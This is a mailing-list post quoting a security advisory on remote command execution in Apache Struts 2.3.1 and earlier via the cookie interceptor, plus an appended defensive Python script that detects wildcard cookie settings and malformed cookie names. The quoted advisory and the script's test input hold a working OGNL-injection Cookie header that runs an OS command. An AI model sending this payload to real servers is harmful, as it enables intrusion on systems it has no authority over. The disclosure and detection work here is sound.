Just how bad is that Sec-Consult Apache Struts vulnerability... (from their advisory)

___
2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)

Given struts.xml is configured to handle all cookie names (independent of limited cookie values):

<action name="Test" class="example.Test">
    <interceptor-ref name="cookie">
        <param name="cookiesName">*</param>
        <param name="cookiesValue">1,2</param>
    </interceptor-ref>
    <result ...>
</action>

The following HTTP header will execute an OS command when sent to Test.action:

Cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1
___

I assume Struts is extremely widely used and everyone is already owned? Who was it who thought that OGNL was a good idea? Between this and .Net being completely broken, the only platforms left are Ruby on Rails and Python's Django! Oh, and PHP! :>

-dave

--
INFILTRATE 2012 January 12th-13th in Miami - the world's best offensive information security conference.
www.infiltratecon.com
_______________________________________________
Dailydave mailing list
Dailydave@lists.immunityinc.com
http://lists.immunityinc.com/mailman/listinfo/dailydave
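Added example, not part of the original post or the advisory: a Python check a defender could run to find cookie interceptor references in struts.xml whose cookiesName accepts "*", and to flag Cookie headers whose names are not valid RFC 6265 tokens, as both names in the advisory's header are not. The function names and the sample XML are constructed for illustration; the advisory's header is used only as test input.

```python
import re
import xml.etree.ElementTree as ET

# RFC 6265 cookie-name is an RFC 2616 token: separators ( ) [ ] @ " \ are invalid.
TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")

def wildcard_cookie_refs(struts_xml):
    """Return 'tag:name' of each element whose cookie interceptor-ref accepts '*'."""
    hits = []
    for parent in ET.fromstring(struts_xml).iter():
        for ref in parent.findall("interceptor-ref"):
            if ref.get("name") != "cookie":
                continue
            for param in ref.findall("param"):
                names = [n.strip() for n in (param.text or "").split(",")]
                if param.get("name") == "cookiesName" and "*" in names:
                    hits.append(f"{parent.tag}:{parent.get('name')}")
    return hits

def non_token_cookie_names(cookie_header):
    """Return cookie names in a Cookie header value that are not valid tokens."""
    names = (pair.split("=", 1)[0].strip() for pair in cookie_header.split(";"))
    return [n for n in names if n and not TOKEN.match(n)]

# Constructed struts.xml modelled on the advisory's configuration, plus a
# second action with an explicit cookie-name list for contrast.
SAMPLE_XML = """<struts><package name="p" extends="struts-default">
  <action name="Test" class="example.Test">
    <interceptor-ref name="cookie">
      <param name="cookiesName">*</param>
      <param name="cookiesValue">1,2</param>
    </interceptor-ref>
  </action>
  <action name="Prefs" class="example.Prefs">
    <interceptor-ref name="cookie">
      <param name="cookiesName">lang,theme</param>
    </interceptor-ref>
  </action>
</package></struts>"""

# Cookie header value as quoted in the advisory, and a constructed benign one.
ADVISORY_COOKIE = r'''(#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1'''
BENIGN_COOKIE = "lang=en; theme=dark"

if __name__ == "__main__":
    print(wildcard_cookie_refs(SAMPLE_XML))
    print(non_token_cookie_names(ADVISORY_COOKIE))
    print(non_token_cookie_names(BENIGN_COOKIE))
```

The config check also covers interceptor-ref elements declared under other parents such as interceptor stacks, since it walks every element rather than only actions.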